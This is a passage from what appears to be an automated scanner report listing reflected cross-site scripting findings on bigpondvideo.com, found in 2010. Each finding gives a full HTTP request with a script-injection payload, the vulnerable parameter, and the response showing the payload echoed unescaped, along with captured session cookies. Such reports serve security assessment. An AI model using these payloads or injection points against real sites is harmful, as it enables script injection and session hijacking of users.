Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:09:32 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Connection: close
Content-Length: 58294

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-UA-C
...[SNIP]...
://www.macromedia.com/go/getflashplayer',
                                                   'wmode','transparent',
                                                   'FlashVars','randFlashId=NV4ceb306cbe8e2&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&92b3c</script><script>alert(1)</script>39d188c5399=1&contentId=Flash&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code
                           </script>
...[SNIP]...

2.496. http://bigpondvideo.com/Web/Flash/skyscraperL [rand parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondvideo.com
Path:   /Web/Flash/skyscraperL

Issue detail

The value of the rand request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload db9c2</script><script>alert(1)</script>594a0b6d6c1 was submitted in the rand parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Web/Flash/skyscraperL?rand=2db9c2</script><script>alert(1)</script>594a0b6d6c1 HTTP/1.1
Host: bigpondvideo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:09:20 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Connection: close
Content-Length: 58298

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-UA-C
...[SNIP]...
.macromedia.com/go/getflashplayer',
                                                   'wmode','transparent',
                                                   'FlashVars','randFlashId=NV4ceb3060b6e35&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&rand=2db9c2</script><script>alert(1)</script>594a0b6d6c1&contentId=Flash&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code
                           </script>
...[SNIP]...

2.497. http://bigpondvideo.com/Web/Flash/skyscraperR [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondvideo.com
Path:   /Web/Flash/skyscraperR

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cf9fb</script><script>alert(1)</script>eb7bc4b9bc1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Web/Flash/skyscraperR?cf9fb</script><script>alert(1)</script>eb7bc4b9bc1=1 HTTP/1.1
Host: bigpondvideo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:09:31 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Connection: close
Content-Length: 58294

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-UA-C
...[SNIP]...
://www.macromedia.com/go/getflashplayer',
                                                   'wmode','transparent',
                                                   'FlashVars','randFlashId=NV4ceb306bf024d&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&cf9fb</script><script>alert(1)</script>eb7bc4b9bc1=1&contentId=Flash&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code
                           </script>
...[SNIP]...

2.498. http://bigpondvideo.com/Web/Flash/skyscraperR [rand parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondvideo.com
Path:   /Web/Flash/skyscraperR

Issue detail

The value of the rand request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 499b8</script><script>alert(1)</script>1c40c13ffef was submitted in the rand parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Web/Flash/skyscraperR?rand=2499b8</script><script>alert(1)</script>1c40c13ffef HTTP/1.1
Host: bigpondvideo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:09:25 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Connection: close
Content-Length: 58298

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-UA-C
...[SNIP]...
.macromedia.com/go/getflashplayer',
                                                   'wmode','transparent',
                                                   'FlashVars','randFlashId=NV4ceb3065e87ed&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&rand=2499b8</script><script>alert(1)</script>1c40c13ffef&contentId=Flash&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code
                           </script>
...[SNIP]...

2.499. http://bigpondvideo.com/Web/Flash/title_bar [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondvideo.com
Path:   /Web/Flash/title_bar

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 24f17</script><script>alert(1)</script>cceeffabb68 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Web/Flash/title_bar?24f17</script><script>alert(1)</script>cceeffabb68=1 HTTP/1.1
Host: bigpondvideo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:09:37 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Connection: close
Content-Length: 58294

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-UA-C
...[SNIP]...
://www.macromedia.com/go/getflashplayer',
                                                   'wmode','transparent',
                                                   'FlashVars','randFlashId=NV4ceb30711e59f&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&24f17</script><script>alert(1)</script>cceeffabb68=1&contentId=Flash&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code
                           </script>
...[SNIP]...

2.500. http://bigpondvideo.com/Web/Flash/title_bar [rand parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondvideo.com
Path:   /Web/Flash/title_bar

Issue detail

The value of the rand request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5b087</script><script>alert(1)</script>a4f8a63dab7 was submitted in the rand parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Web/Flash/title_bar?rand=25b087</script><script>alert(1)</script>a4f8a63dab7 HTTP/1.1
Host: bigpondvideo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:09:30 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Connection: close
Content-Length: 58298

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-UA-C
...[SNIP]...
.macromedia.com/go/getflashplayer',
                                                   'wmode','transparent',
                                                   'FlashVars','randFlashId=NV4ceb306a447a2&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&rand=25b087</script><script>alert(1)</script>a4f8a63dab7&contentId=Flash&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code
                           </script>
...[SNIP]...

2.501. http://bigpondvideo.com/footytv/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondvideo.com
Path:   /footytv/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload be39c</script><script>alert(1)</script>093cbd07583 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /footytv/?be39c</script><script>alert(1)</script>093cbd07583=1 HTTP/1.1
Host: bigpondvideo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:08:22 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Connection: close
Content-Length: 58313

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-UA-C
...[SNIP]...
://www.macromedia.com/go/getflashplayer',
                                                   'wmode','transparent',
                                                   'FlashVars','randFlashId=NV4ceb302653860&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&be39c</script><script>alert(1)</script>093cbd07583=1&channelId=103&channelTitle=footytv&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code
                           </script>
...[SNIP]...

2.502. http://bigpondvideo.com/footytv/ [ref parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondvideo.com
Path:   /footytv/

Issue detail

The value of the ref request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7435d</script><script>alert(1)</script>b1776d07c6 was submitted in the ref parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /footytv/?ref=Net-Head-TV-Footy7435d</script><script>alert(1)</script>b1776d07c6 HTTP/1.1
Host: bigpondvideo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:08:18 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Connection: close
Content-Length: 58331

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-UA-C
...[SNIP]...
/go/getflashplayer',
                                                   'wmode','transparent',
                                                   'FlashVars','randFlashId=NV4ceb30226695b&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&ref=Net-Head-TV-Footy7435d</script><script>alert(1)</script>b1776d07c6&channelId=103&channelTitle=footytv&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code
                           </script>
...[SNIP]...

2.503. http://bigpondvideo.com/games/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondvideo.com
Path:   /games/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 60dc5</script><script>alert(1)</script>635bf275af3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /games/?60dc5</script><script>alert(1)</script>635bf275af3=1 HTTP/1.1
Host: bigpondvideo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:08:50 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Connection: close
Content-Length: 58291

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-UA-C
...[SNIP]...
://www.macromedia.com/go/getflashplayer',
                                                   'wmode','transparent',
                                                   'FlashVars','randFlashId=NV4ceb3042482aa&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&60dc5</script><script>alert(1)</script>635bf275af3=1&navId=473&channelTitle=Games&targetLevel=Videos.Games.Latest&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code
                           </script>
...[SNIP]...

2.504. http://bigpondvideo.com/games/ [ref parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondvideo.com
Path:   /games/

Issue detail

The value of the ref request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 17b81</script><script>alert(1)</script>cb1d9075c4b was submitted in the ref parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /games/?ref=Net-Head-TV-Games17b81</script><script>alert(1)</script>cb1d9075c4b HTTP/1.1
Host: bigpondvideo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:08:44 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Connection: close
Content-Length: 58310

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-UA-C
...[SNIP]...
/go/getflashplayer',
                                                   'wmode','transparent',
                                                   'FlashVars','randFlashId=NV4ceb303c44555&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&ref=Net-Head-TV-Games17b81</script><script>alert(1)</script>cb1d9075c4b&navId=473&channelTitle=Games&targetLevel=Videos.Games.Latest&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code
                           </script>
...[SNIP]...

2.505. http://bigpondvideo.com/leaguetv/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondvideo.com
Path:   /leaguetv/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bba89</script><script>alert(1)</script>ab16827882a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /leaguetv/?bba89</script><script>alert(1)</script>ab16827882a=1 HTTP/1.1
Host: bigpondvideo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:08:27 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Connection: close
Content-Length: 58314

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-UA-C
...[SNIP]...
://www.macromedia.com/go/getflashplayer',
                                                   'wmode','transparent',
                                                   'FlashVars','randFlashId=NV4ceb302be0af5&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&bba89</script><script>alert(1)</script>ab16827882a=1&channelId=104&channelTitle=leaguetv&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code
                           </script>
...[SNIP]...

2.506. http://bigpondvideo.com/leaguetv/ [ref parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondvideo.com
Path:   /leaguetv/

Issue detail

The value of the ref request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cceff</script><script>alert(1)</script>01879efc31d was submitted in the ref parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /leaguetv/?ref=Net-Head-TV-Leaguecceff</script><script>alert(1)</script>01879efc31d HTTP/1.1
Host: bigpondvideo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:08:22 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Connection: close
Content-Length: 58334

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-UA-C
...[SNIP]...
go/getflashplayer',
                                                   'wmode','transparent',
                                                   'FlashVars','randFlashId=NV4ceb3027167da&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&ref=Net-Head-TV-Leaguecceff</script><script>alert(1)</script>01879efc31d&channelId=104&channelTitle=leaguetv&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code
                           </script>
...[SNIP]...

2.507. http://bigpondvideo.com/musictv/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondvideo.com
Path:   /musictv/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4f5f5</script><script>alert(1)</script>7eead953a9f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /musictv/?4f5f5</script><script>alert(1)</script>7eead953a9f=1 HTTP/1.1
Host: bigpondvideo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:09:03 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Connection: close
Content-Length: 58313

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-UA-C
...[SNIP]...
://www.macromedia.com/go/getflashplayer',
                                                   'wmode','transparent',
                                                   'FlashVars','randFlashId=NV4ceb304fdcfb9&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&4f5f5</script><script>alert(1)</script>7eead953a9f=1&channelId=101&channelTitle=musictv&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code
                           </script>
...[SNIP]...

2.508. http://bigpondvideo.com/musictv/ [ref parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondvideo.com
Path:   /musictv/

Issue detail

The value of the ref request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a042b</script><script>alert(1)</script>3171aedcdae was submitted in the ref parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /musictv/?ref=Net-Head-TV-MusicTVa042b</script><script>alert(1)</script>3171aedcdae HTTP/1.1
Host: bigpondvideo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:09:05 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
